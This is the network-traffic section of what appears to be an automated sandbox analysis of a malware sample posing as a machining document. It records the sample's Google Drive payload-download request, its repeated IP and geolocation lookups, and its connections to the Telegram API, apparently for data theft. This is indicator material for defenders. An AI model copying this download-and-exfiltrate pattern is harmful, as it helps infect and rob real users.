                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907107115 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907834053 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907855034 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.908026934 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.908291101 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.908302069 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.955526114 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.102690935 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.103929996 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.103941917 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346183062 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346333027 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346487045 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346678972 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.348664045 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554243088 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554884911 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554909945 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.555068016 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.555299997 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.555311918 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.596113920 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.749639034 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.750950098 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.750962973 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.989706039 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.989798069 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.989964008 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.990320921 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.122591972 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.122617006 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.122876883 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.123204947 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.123214006 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.465652943 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.465888023 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.467138052 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.467144966 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.467370987 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.468532085 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.512177944 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.795916080 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.796214104 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.796418905 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.798367977 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:57:25.553780079 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:57:25.554013014 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:58:00.574556112 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:58:00.779550076 CEST8049710132.226.247.73192.168.11.20

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.259800911 CEST5522353192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.355201960 CEST53552231.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.923787117 CEST6444853192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.019623041 CEST53644481.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.658154964 CEST6244053192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST53624401.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.916315079 CEST6329553192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.018403053 CEST53632951.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.027539015 CEST5997853192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.121890068 CEST53599781.1.1.1192.168.11.20

                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.259800911 CEST192.168.11.201.1.1.10x6a9aStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.923787117 CEST192.168.11.201.1.1.10x8bdcStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.658154964 CEST192.168.11.201.1.1.10xe0b2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.916315079 CEST192.168.11.201.1.1.10x8079Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.027539015 CEST192.168.11.201.1.1.10x2caaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.355201960 CEST1.1.1.1192.168.11.200x6a9aNo error (0)drive.google.com142.250.80.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.019623041 CEST1.1.1.1192.168.11.200x8bdcNo error (0)drive.usercontent.google.com142.250.65.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST1.1.1.1192.168.11.200xe0b2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST1.1.1.1192.168.11.200xe0b2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST1.1.1.1192.168.11.200xe0b2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST1.1.1.1192.168.11.200xe0b2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST1.1.1.1192.168.11.200xe0b2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.753546000 CEST1.1.1.1192.168.11.200xe0b2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.018403053 CEST1.1.1.1192.168.11.200x8079No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.018403053 CEST1.1.1.1192.168.11.200x8079No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.121890068 CEST1.1.1.1192.168.11.200x2caaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • drive.google.com
                                                                                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                                                                                        • api.telegram.org
                                                                                                                                                                                                                        • checkip.dyndns.org

                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.11.2049710132.226.247.7380800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.962987900 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.168529034 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:14 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 2f545c233f7eeef3d4efa937d0811288
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.172167063 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.377677917 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:14 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: b2c3dfc312dcdb17e0c6fa64352b87a9
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.831007004 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.036747932 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 9015fbcb10c6c40f2a58dcb6fea636d4
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.473608017 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.679282904 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:16 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: c016c2b5da95cf21c26d47ba60012b40
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.121479988 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.326919079 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:17 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 29dacb5bdc775c9df0a4d95363864340
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.763058901 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.968271971 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:17 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 20819ee7e268254f94f5b21e69d3f92b
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.407128096 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.612593889 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:18 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 5758bacdf9ba2f0546ad39a420e74c1f
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.057010889 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262243032 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 2c607c59f5f9fd211ee9d561dc651b33
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.701792955 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907107115 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 343b62c7efc39a4ee6c4ce67969830bf
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.348664045 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554243088 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:20 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 7769cc9146b04d9d16e773a16c7bff00
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>


                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.11.2049708142.250.80.46443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:09 UTC216OUTGET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        2024-10-07 08:56:09 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:09 GMT
                                                                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'nonce-1srqt_NIum69tHTq6-xusQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.11.2049709142.250.65.225443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:10 UTC258OUTGET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC4891INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
